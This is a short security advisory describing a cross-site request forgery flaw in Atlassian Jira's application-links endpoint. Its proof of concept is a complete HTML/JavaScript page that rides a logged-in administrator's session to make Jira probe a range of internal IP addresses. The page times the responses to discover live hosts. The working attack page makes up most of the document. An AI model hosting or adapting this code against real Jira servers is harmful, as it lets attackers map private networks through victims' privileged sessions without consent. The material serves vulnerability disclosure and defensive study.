Atlassian Jira CSRF

It is possible to perform a CSRF on the following request for configuring application links: /rest/applinks/3.0/applicationlinkForm/manifest.json

To exploit this vulnerability an attacker would need to convince a user with an active WebSudo session (and permissions to create application links,) to click on a crafted link.

Proof of Concept:

The below code generates a request to the Jira server to initiate the process of creating an application link for a range of IP addresses (this script was set to test the range 172.16.68.220-240 on port 80). The script times how long it takes to get a response from each host, and posts it on a textArea on the web page.

<html>
  <head>
     <meta name="referrer" content="no-referrer">
  </head>
  <body>
    <h2>CSRF Host Discovery Scanner via the Application Links</h2>
    
    <p><button onclick="startScan()">scan</button>
    <br>
    <textarea id="textarea" rows=34 cols=50></textarea>

    <script>
      function startScan() {
        doFetch('172.16.68.151', 220, 240);   
      }

      function doFetch(jiraIp, currentIp, endIp) {
        var timer = Date.now();
        var url = '172.16.68.' + currentIp.toString();
        fetch('http://' + jiraIp + ':8080/rest/applinks/3.0/applicationlinkForm/manifest.json?url=http://' + url +'/insertMessageHere:80&_=1572448964763',
        { 
          method: 'GET', 
          credentials: 'include'
        })
        .then(function(response) {
          return response.text();
        })
        .then(function(text) {
          timer = Date.now() - timer;
          document.getElementById("textarea").value += "\nip: " + url + " \tResponse time: " + timer + "ms";
          if (currentIp < endIp)
            doFetch(jiraIp, currentIp + 1, endIp);
        })
      }
    </script>
  </body>
</html>